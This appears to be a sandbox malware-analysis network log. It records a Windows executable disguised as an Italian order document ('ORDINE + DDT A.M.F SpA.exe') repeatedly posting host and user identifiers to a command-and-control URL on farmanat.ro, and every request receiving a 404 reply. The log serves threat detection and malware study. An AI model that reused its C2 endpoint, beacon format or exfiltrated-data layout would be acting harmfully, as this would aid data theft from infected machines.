Nov 25, 2021 10:51:21.156398058 CET	6844	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:21.190673113 CET	6844	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:21.242856979 CET	6844	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
375	192.168.11.20	50219	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:21.660669088 CET	6845	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:21.694211960 CET	6845	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:21.743335962 CET	6846	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
376	192.168.11.20	50220	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:22.171066046 CET	6846	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:22.205435991 CET	6847	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:22.257762909 CET	6847	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
377	192.168.11.20	50221	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:22.650389910 CET	6848	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:22.684088945 CET	6848	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:22.733273029 CET	6848	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
378	192.168.11.20	50222	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:23.144422054 CET	6849	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:23.178015947 CET	6849	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:23.227411985 CET	6850	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
379	192.168.11.20	50223	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:23.652940035 CET	6850	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:23.687066078 CET	6851	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:23.736828089 CET	6851	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.11.20	49874	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:26.412909985 CET	6363	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:26.446912050 CET	6363	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:26.499762058 CET	6364	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
380	192.168.11.20	50224	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:24.110114098 CET	6852	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:24.143414021 CET	6852	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:24.195945024 CET	6852	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
381	192.168.11.20	50225	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:24.605767965 CET	6853	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:24.639946938 CET	6853	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:24.701908112 CET	6854	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
382	192.168.11.20	50226	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:25.134458065 CET	6854	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:25.168150902 CET	6855	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:25.217587948 CET	6855	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
383	192.168.11.20	50227	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:25.644833088 CET	6856	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:25.679064035 CET	6856	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:25.729237080 CET	6856	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
384	192.168.11.20	50228	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:26.123163939 CET	6857	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:26.157428026 CET	6857	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:26.210153103 CET	6858	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
385	192.168.11.20	50229	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:26.626689911 CET	6858	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:26.660278082 CET	6858	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:26.710566998 CET	6859	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
386	192.168.11.20	50230	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:27.099309921 CET	6860	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:27.132802010 CET	6860	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:27.182981014 CET	6860	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
387	192.168.11.20	50231	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:27.588196039 CET	6861	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:27.622354984 CET	6861	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:27.675956011 CET	6862	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
388	192.168.11.20	50232	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:28.063643932 CET	6862	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:28.096844912 CET	6862	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:28.145936966 CET	6863	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
389	192.168.11.20	50233	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:28.555424929 CET	6864	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:28.589751005 CET	6864	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:28.639452934 CET	6864	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.11.20	49875	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:27.083163977 CET	6364	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:27.117561102 CET	6365	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:27.176875114 CET	6365	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
390	192.168.11.20	50234	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:29.050192118 CET	6865	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:29.083579063 CET	6865	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:29.132563114 CET	6866	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
391	192.168.11.20	50235	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:29.546638012 CET	6866	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:29.580894947 CET	6866	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:29.630446911 CET	6867	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
392	192.168.11.20	50236	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:30.065751076 CET	6868	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:30.099304914 CET	6868	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
